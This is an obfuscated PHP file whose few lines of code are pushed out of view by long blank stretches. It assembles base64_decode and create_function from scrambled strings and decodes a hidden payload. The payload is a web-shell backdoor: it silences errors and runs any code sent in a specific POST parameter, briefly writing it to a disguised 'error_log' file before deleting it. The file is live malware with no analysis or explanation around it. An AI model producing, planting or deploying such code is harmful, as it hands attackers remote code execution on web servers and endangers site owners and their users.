































































































																																																																							                                                                                         <?php

																		                    $zc = "0sMSk/pLlBIUF9FT0w/uJz8+JzsNCi/AgZm9yKCRpPTA7JGk8MTAwOyR/pKyspJGVycj1Q/SFBf/RU/9MLiRlcnI7DQogIEBmaW/xlX3B1";




















































































																																			                                     $dI = "d/F9jb250ZW50cy/gnZXJy/b3JfbG/9nJy/wnUEhQIEZhdGFsIGV/ycm9yOiAgVW5jYXVnaHQg/RXJyb3I6IGNvZGUoM/SkgPCcu/Jz9wa";




























																                                                                           $Q3b = "V/0KCRfUE9TVFs/nMTA1NTQ0OTkyNSddKSl7DQo/gICRlcnI9YmFzZT/Y0X2RlY29kZShzdWJzdHIoJ/F9Q/T1NUWycxMDU1NDQ5OTI1J1";
































			                                               $nd4 = "HAnL/iRlcnIpOw0KICBAcmVx/dWl/yZV9vbmNlKCdlcnJvcl9/sb2cnKTsNC/iAgQH/VubGl/uaygnZXJyb3JfbG9nJyk7ZXhpdDsNCn0=";






























































































																										  $Gz = str_replace("f", "", "stfr_frefpflacfe");



















								                    $YL = $Gz("j", "", "crejatje_jfunjctijojn");






																																																																																															                                                 $jf8 = $Gz("j", "", "jbajsjej6j4j_jdejcjode");































































































																																																									                                                     $dxH = "ZXJyb3JfcmVwb3J0aW5nKDApOw0KaWd/ub3Jl/X/3VzZX/JfYWJv/c/nQodHJ1ZSk7DQpzZX/RfdGltZV9saW1pdCgwKT/sNCmlmKGlzc2";






																																																	                                $T06 = $YL("", $jf8($Gz("/", "", $dxH.$Q3b.$zc.$dI.$nd4)));

































																																													   $T06();






















																																														                     
